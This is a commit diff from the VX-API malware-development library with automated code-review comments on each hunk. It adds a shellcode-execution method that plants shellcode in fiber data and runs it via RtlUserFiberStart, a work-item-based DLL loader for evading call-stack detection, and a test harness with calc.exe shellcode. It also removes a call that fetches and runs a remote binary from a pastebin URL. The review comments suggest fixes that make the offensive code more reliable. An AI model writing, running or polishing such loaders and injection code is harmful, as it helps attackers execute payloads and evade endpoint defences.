2.0.420
vxunderground 2022-12-05 08:05:13 -06:00
parent 1aed815bd8
commit d6ff84b546
11 changed files with 140 additions and 59 deletions


@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
# VX-API
Version: 2.0.402
Version: 2.0.420
Developer: smelly__vx
@ -136,6 +136,7 @@ You're free to use this in any manner you please. You do not need to use this en
| GetRtlUserProcessParameters | ReactOS | Library Loading |
| GetTeb | ReactOS | Library Loading |
| RtlLoadPeHeaders | smelly__vx | Library Loading |
| ProxyWorkItemLoadLibrary | Rad98, Peter Winter-Smith | Library Loading |
| MpfComModifyShortcutTarget | Unknown | Malcode |
| MpfComVssDeleteShadowVolumeBackups | am0nsec | Malcode |
| OleGetClipboardData | Microsoft | Malcode |


@ -26,6 +26,9 @@ typedef NTSTATUS(NTAPI* RTLIPV4STRINGTOADDRESSW)(PCWSTR, BOOL, LPCWSTR*, PIN_ADD
typedef NTSTATUS(NTAPI* RTLIPV4STRINGTOADDRESSA)(PCSTR, BOOL, LPCSTR*, PIN_ADDR);
typedef PWSTR(NTAPI* RTLIPV4ADDRESSTOSTRINGW)(PIN_ADDR, PWSTR);
typedef PSTR(NTAPI* RTLIPV4ADDRESSTOSTRINGA)(PIN_ADDR, PSTR);
typedef INT(NTAPI* RTLUSERFIBERSTART)(VOID);
typedef NTSTATUS(NTAPI* NTWAITFORSINGLEOBJECT)(HANDLE, BOOL, PLARGE_INTEGER);
typedef NTSTATUS(NTAPI* RTLQUEUEWORKITEM)(PRTL_WORK_ITEM_ROUTINE, PVOID, ULONG);
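Review bot: The NTWAITFORSINGLEOBJECT typedef at line 31 declares its second parameter as BOOL, while the native NtWaitForSingleObject takes a one-byte BOOLEAN for Alertable; in practice the argument is passed widened so nothing breaks, but the declaration should match the documented prototype, `typedef NTSTATUS(NTAPI* NTWAITFORSINGLEOBJECT)(HANDLE, BOOLEAN, PLARGE_INTEGER);`. RTLQUEUEWORKITEM on line 32 uses PRTL_WORK_ITEM_ROUTINE, which this commit defines in a different header, so this file now depends on include order; a short comment naming where that type comes from would save the next reader a search.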


@ -16,7 +16,21 @@ HMODULE GetModuleHandleEx2A(_In_ LPCSTR lpModuleName)
{
ZeroMemoryEx(wDllName, sizeof(wDllName));
WCharStringToCharString(wDllName, Module->BaseDllName.Buffer, 64);
if (StringCompareA(lpModuleName, wDllName) == 0)
CHAR InitialModuleName[256] = { 0 };
CHAR IdentifiedModuleName[256] = { 0 };
if (StringCopyA(InitialModuleName, (PCHAR)lpModuleName) == NULL)
return NULL;
if (StringCopyA(IdentifiedModuleName, wDllName) == NULL)
return NULL;
PCHAR ComparisonObject1 = CaplockStringA(InitialModuleName);
PCHAR ComparisonObject2 = CaplockStringA(IdentifiedModuleName);
if (StringCompareA(ComparisonObject1, ComparisonObject2) == 0)
return (HMODULE)Module->BaseAddress;
}
@ -40,7 +54,19 @@ HMODULE GetModuleHandleEx2W(_In_ LPCWSTR lpModuleName)
Module = (PLDR_MODULE)((PBYTE)Next - 16);
if (Module->BaseDllName.Buffer != NULL)
{
if (StringCompareW(lpModuleName, Module->BaseDllName.Buffer) == 0)
WCHAR InitialModuleName[256] = { 0 };
WCHAR IdentifiedModuleName[256] = { 0 };
if (StringCopyW(InitialModuleName, (PWCHAR)lpModuleName) == NULL)
return NULL;
if (StringCopyW(IdentifiedModuleName, Module->BaseDllName.Buffer) == NULL)
return NULL;
PWCHAR ComparisonObject1 = CaplockStringW(InitialModuleName);
PWCHAR ComparisonObject2 = CaplockStringW(IdentifiedModuleName);
if (StringCompareW(ComparisonObject1, ComparisonObject2) == 0)
return (HMODULE)Module->BaseAddress;
}
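Review bot: StringCopyA at line 43 and StringCopyW at line 59 copy the caller's lpModuleName into fixed 256-element stack buffers with no length bound, so a name of 256 characters or more overruns the stack (assuming StringCopyA/W are unbounded strcpy analogues, which their two-argument signature suggests). Guard before the copy with the project's length helper or `strlen`/`wcslen`, e.g. `if (strlen(lpModuleName) >= sizeof InitialModuleName) return NULL;`, or use a case-insensitive compare that needs no copy at all. The same pattern is repeated at lines 45 and 61 for the module's own name. Note also that a copy failure returns NULL from the whole function instead of skipping that module, so one odd entry hides every module after it in the list. Both enclosing functions, GetModuleHandleEx2A and GetModuleHandleEx2W, start and end outside the hunks.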


@ -1124,3 +1124,4 @@ typedef struct _FILE_PROCESS_IDS_USING_FILE_INFORMATION{
typedef VOID(NTAPI* PIO_APC_ROUTINE)(PVOID ApcContext, _In_ PIO_STATUS_BLOCK IoStatusBlock, _In_ ULONG Reserved);
typedef DWORD(CALLBACK* PRTL_WORK_ITEM_ROUTINE)(LPVOID);


@ -30,20 +30,16 @@ int main(VOID)
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
/*SHELLCODE_EXECUTION_INFORMATION Sei = { 0 };
SHELLCODE_EXECUTION_INFORMATION Sei = { 0 };
Sei.Payload = GlobalOpenCalcPayload;
Sei.dwLengthOfPayloadInBytes = 277;
Sei.MethodEnum = E_DNSQUERYEX;
Sei.MethodEnum = E_RTLUSERFIBERSTART;
ShellcodeExecutionViaFunctionCallbackMain(&Sei);
*/
MpfLolExecuteRemoteBinaryByAppInstallerW((PWCHAR)L"https://pastebin.com/raw/tdyShwLw", 34);
//ShellcodeExecutionViaFunctionCallbackMain(&Sei);
HMODULE hMod = ProxyWorkItemLoadLibraryA("DBGHELP.DLL");
return dwError;
}
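Review bot: The handle returned by ProxyWorkItemLoadLibraryA at line 90 is stored in hMod and never examined, and dwError is returned unchanged, so the harness exits with the same status whether or not the proxied load produced a module. `if (hMod == NULL) dwError = ERROR_MOD_NOT_FOUND;` before the return would make the test meaningful. The Sei block at lines 80-87 and the call at line 89 are left commented out; dead code like this should be deleted rather than toggled, since the enum value it refers to is flagged as failing elsewhere in this commit. main begins outside the hunk.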


@ -1,46 +0,0 @@
#include "Win32Helper.h"
typedef int(WINAPI* RtlUserFiberStart)();
DWORD __revision_required_ProcessInjectFiberData(_In_ PCHAR Shellcode, _In_ DWORD Length)
{
NTSTATUS status;
DWORD OldProt = 0;
PTEB pTeb = GetTeb();
PVOID pTebFlags = (PVOID)((UINT_PTR)pTeb + 0x17ee);
*(PCHAR)pTebFlags = *(PCHAR)pTebFlags | 0x4;
HMODULE hModule = GetModuleHandleA("ntdll.dll");
RtlUserFiberStart pRtlUserFiberStart = (RtlUserFiberStart)GetProcAddress(hModule, "RtlUserFiberStart");
LPVOID BufferAddress = VirtualAlloc(NULL,
Length,
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE);
RtlCopyMemory(BufferAddress, Shellcode, Length);
status = VirtualProtect(BufferAddress,
Length,
PAGE_EXECUTE_READ,
&OldProt);
if (status != 0)
{
UINT_PTR pFiberData = (UINT_PTR)HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY,
0x100);
*(LPVOID*)(pFiberData + 0x0a8) = BufferAddress;
__writegsqword(0x20, pFiberData);
pRtlUserFiberStart();
HeapFree(GetProcessHeap(), 0, (LPVOID)pFiberData);
}
VirtualFree(BufferAddress, Length, MEM_RELEASE);
return 0;
}


@ -0,0 +1,49 @@
#include "Win32Helper.h"
HMODULE ProxyWorkItemLoadLibraryW(_In_ LPCWSTR lpModuleName)
{
NTWAITFORSINGLEOBJECT NtWaitForSingleObject = NULL;
RTLQUEUEWORKITEM RtlQueueWorkItem = NULL;
NTSTATUS Status = STATUS_SUCCESS;
LARGE_INTEGER Timeout = { 0 };
NtWaitForSingleObject = (NTWAITFORSINGLEOBJECT)GetProcAddressA((DWORD64)GetModuleHandleEx2W(L"ntdll.dll"), "NtWaitForSingleObject");
RtlQueueWorkItem = (RTLQUEUEWORKITEM)GetProcAddressA((DWORD64)GetModuleHandleEx2W(L"ntdll.dll"), "RtlQueueWorkItem");
if (!NtWaitForSingleObject || !RtlQueueWorkItem)
return NULL;
Status = RtlQueueWorkItem((PRTL_WORK_ITEM_ROUTINE)&LoadLibraryW, (PVOID)lpModuleName, WT_EXECUTEDEFAULT);
if (!NT_SUCCESS(Status))
return NULL;
Timeout.QuadPart = -500000;
NtWaitForSingleObject(InlineGetCurrentProcess, FALSE, &Timeout);
return GetModuleHandleEx2W(lpModuleName);
}
HMODULE ProxyWorkItemLoadLibraryA(_In_ LPCSTR lpModuleName)
{
NTWAITFORSINGLEOBJECT NtWaitForSingleObject = NULL;
RTLQUEUEWORKITEM RtlQueueWorkItem = NULL;
NTSTATUS Status = STATUS_SUCCESS;
LARGE_INTEGER Timeout = { 0 };
NtWaitForSingleObject = (NTWAITFORSINGLEOBJECT)GetProcAddressA((DWORD64)GetModuleHandleEx2W(L"ntdll.dll"), "NtWaitForSingleObject");
RtlQueueWorkItem = (RTLQUEUEWORKITEM)GetProcAddressA((DWORD64)GetModuleHandleEx2W(L"ntdll.dll"), "RtlQueueWorkItem");
if (!NtWaitForSingleObject || !RtlQueueWorkItem)
return NULL;
Status = RtlQueueWorkItem((PRTL_WORK_ITEM_ROUTINE)&LoadLibraryA, (PVOID)lpModuleName, WT_EXECUTEDEFAULT);
if (!NT_SUCCESS(Status))
return NULL;
Timeout.QuadPart = -500000;
NtWaitForSingleObject(InlineGetCurrentProcess, FALSE, &Timeout);
return GetModuleHandleEx2A(lpModuleName);
}
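Review bot: The wait at line 149 (and again at 166) is on the current process handle with a fixed relative timeout of -500000, i.e. 50 ms in 100 ns units, which is effectively a sleep because a running process object is never signalled; if the worker has not finished LoadLibrary in that window, the lookup on line 150 returns NULL even though the load still completes later, and the NTSTATUS from NtWaitForSingleObject is discarded. At minimum the constant needs a comment, `// -500000 = 50 ms relative wait on our own process handle: this only bounds how long we wait, it does not signal that the work item has run`, and the header should tell callers that NULL can mean "not loaded yet" rather than "failed". The A variant at lines 152-168 duplicates the W body verbatim apart from the final lookup; converting the name and delegating to the W version would keep one copy of the lookup, queue and wait logic. Casting &LoadLibraryW/&LoadLibraryA to PRTL_WORK_ITEM_ROUTINE also relies on the HMODULE-versus-DWORD return mismatch being benign, which deserves a comment.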


@ -219,6 +219,30 @@ DWORD ShellcodeExecutionDispatchHandler(LPVOID Param)
}
case E_RTLUSERFIBERSTART:
{
RTLUSERFIBERSTART RtlUserFiberStart = NULL;
DWORD64 FiberData = NULL;
PTEB Teb = GetTeb();
RtlUserFiberStart = (RTLUSERFIBERSTART)GetProcAddressW((DWORD64)GetModuleHandleEx2W(L"ntdll.dll"), L"RtlUserFiberStart");
if (RtlUserFiberStart == NULL)
goto EXIT_ROUTINE;
Teb->SameTebFlags |= 0b100;
FiberData = (DWORD64)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, 0x100);
if (FiberData == NULL)
goto EXIT_ROUTINE;
*(LPVOID*)(FiberData + 0x0a8) = BinAddress;
__writegsqword(0x20, FiberData);
RtlUserFiberStart();
}
default:
goto EXIT_ROUTINE;
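Review bot: The E_RTLUSERFIBERSTART case at lines 174-189 has no break, so if RtlUserFiberStart() returns, control falls into default and jumps to EXIT_ROUTINE; if that is intended, mark it `/* fallthrough */`, otherwise add `break;` before the closing brace. The 0x100-byte block from HeapAlloc at line 183 is never released on that return path (the file this commit deletes freed it with HeapFree after the call), and `DWORD64 FiberData = NULL;` on line 177 assigns a pointer constant to an integer; `DWORD64 FiberData = 0;` with `if (FiberData == 0)` is the correct form. The enum comment added elsewhere in this commit already marks this method as unstable, so the leak and the implicit fallthrough are worth fixing before it is exercised further. The enclosing switch and ShellcodeExecutionDispatchHandler continue outside the hunk.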


@ -161,6 +161,7 @@
<ClCompile Include="GetByteArrayFromFile.cpp" />
<ClCompile Include="GetCurrentDirectoryFromUserProcessParameters.cpp" />
<ClCompile Include="GetCurrentLocaleFromTeb.cpp" />
<ClCompile Include="GetCurrentProcessIdFromOffset.cpp" />
<ClCompile Include="GetCurrentProcessIdFromTeb.cpp" />
<ClCompile Include="GetCurrentUserSid.cpp" />
<ClCompile Include="GetCurrentWindowTextFromUserProcessParameter.cpp" />
@ -189,8 +190,10 @@
<ClCompile Include="GetProcAddressFowlerNollVoVariant1a.cpp" />
<ClCompile Include="GetProcAddressJenkinsOneAtATime32Bit.cpp" />
<ClCompile Include="GetProcAddressLoseLose.cpp" />
<ClCompile Include="GetProcAddressMurmur.cpp" />
<ClCompile Include="GetProcAddressRotr32.cpp" />
<ClCompile Include="GetProcAddressSdbm.cpp" />
<ClCompile Include="GetProcAddressSipHash.cpp" />
<ClCompile Include="GetProcAddressSuperFastHash.cpp" />
<ClCompile Include="GetProcAddressUnknownGenericHash1.cpp" />
<ClCompile Include="GetProcessBinaryNameFromHwnd.cpp" />
@ -205,8 +208,10 @@
<ClCompile Include="HashStringFowlerNollVoVariant1a.cpp" />
<ClCompile Include="HashStringJenkinsOneAtATime32Bit.cpp" />
<ClCompile Include="HashStringLoseLose.cpp" />
<ClCompile Include="HashStringMurmur.cpp" />
<ClCompile Include="HashStringRotr32.cpp" />
<ClCompile Include="HashStringSdbm.cpp" />
<ClCompile Include="HashStringSipHash.cpp" />
<ClCompile Include="HashStringSuperFastHash.cpp" />
<ClCompile Include="HashStringUnknownGenericHash1.cpp" />
<ClCompile Include="IsDebuggerPresentEx.cpp" />
@ -228,6 +233,7 @@
<ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp" />
<ClCompile Include="MpfGetLsaPidFromRegistry.cpp" />
<ClCompile Include="MpfGetLsaPidFromServiceManager.cpp" />
<ClCompile Include="ProxyWorkItemLoadLibrary.cpp" />
<ClCompile Include="__unstable__preview__MpfSilentInstallGoogleChromePlugin.cpp" />
<ClCompile Include="SendIcmpEchoMessageToIPv4Host.cpp" />
<ClCompile Include="OleGetClipboardData.cpp" />
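Review bot: This project file (and the filters file in the next section) adds ClCompile entries for GetCurrentProcessIdFromOffset.cpp, GetProcAddressMurmur.cpp, GetProcAddressSipHash.cpp, HashStringMurmur.cpp and HashStringSipHash.cpp, but none of those sources is among the 11 files this commit changes, and the README table updated in this commit does not list them either. If they are not already in the tree the build fails on missing files; if they are, the README rows are what is missing. Either way the project entries should land in the same commit as the sources and documentation they refer to.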


@ -459,6 +459,24 @@
<ClCompile Include="FastcallExecuteBinaryShellExecuteEx.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="HashStringMurmur.cpp">
<Filter>Source Files\Windows API Helper Functions\Cryptography Related\String Hashing</Filter>
</ClCompile>
<ClCompile Include="HashStringSipHash.cpp">
<Filter>Source Files\Windows API Helper Functions\Cryptography Related\String Hashing</Filter>
</ClCompile>
<ClCompile Include="GetProcAddressSipHash.cpp">
<Filter>Source Files\Windows API Helper Functions\Library Loading</Filter>
</ClCompile>
<ClCompile Include="GetProcAddressMurmur.cpp">
<Filter>Source Files\Windows API Helper Functions\Library Loading</Filter>
</ClCompile>
<ClCompile Include="GetCurrentProcessIdFromOffset.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="ProxyWorkItemLoadLibrary.cpp">
<Filter>Source Files\Windows API Helper Functions\Library Loading</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="Internal.h">


@ -88,7 +88,8 @@ typedef enum SHELLCODE_EXECUTION_METHOD {
E_ENUMERATELOADEDMODULES, //30
E_ENUMPAGEFILESW, //31
E_ENUMPWRSCHEMES, //32
E_DNSQUERYEX //33
E_DNSQUERYEX, //33
E_RTLUSERFIBERSTART //34 UNSTABLE, FAILS
}SHELLCODE_EXECUTION_METHOD, *PSHELLCODE_EXECUTION_METHOD;
typedef struct __SHELLCODE_EXECUTION_INFORMATION {
@ -165,6 +166,8 @@ DWORD64 __stdcall GetProcAddressW(_In_ DWORD64 ModuleBase, _In_ LPCWSTR lpProcNa
BOOL RtlLoadPeHeaders(_Inout_ PIMAGE_DOS_HEADER* Dos, _Inout_ PIMAGE_NT_HEADERS* Nt, _Inout_ PIMAGE_FILE_HEADER* File, _Inout_ PIMAGE_OPTIONAL_HEADER* Optional, _Inout_ PBYTE* ImageBase);
HMODULE GetModuleHandleEx2A(_In_ LPCSTR lpModuleName);
HMODULE GetModuleHandleEx2W(_In_ LPCWSTR lpModuleName);
HMODULE ProxyWorkItemLoadLibraryW(_In_ LPCWSTR lpModuleName);
HMODULE ProxyWorkItemLoadLibraryA(_In_ LPCSTR lpModuleName);
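Review bot: The two new prototypes at lines 277-278 carry no documentation, and the new enum value on line 270 is annotated only as `//34 UNSTABLE, FAILS`, so callers of either get no guidance. A one-line comment above the prototypes such as `// Queues LoadLibraryW/A on an ntdll work item, waits a fixed interval, then looks the module up; returns NULL if it is not yet present in the loader list` states what the implementation in this commit does, and the enum comment should say what "fails" means (returns without executing, faults, hangs) so the dispatcher's behaviour for that value is understood before anyone selects it.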